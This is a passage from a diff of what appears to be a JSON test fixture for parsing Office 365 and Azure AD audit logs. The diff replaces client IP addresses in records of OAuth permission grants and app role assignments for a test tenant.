"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -14582,9 +14582,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:30:06", "ExtendedProperties": [ { @@ -14818,7 +14818,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -14848,9 +14848,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:30:06", "ExtendedProperties": [ { @@ -15084,7 +15084,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86a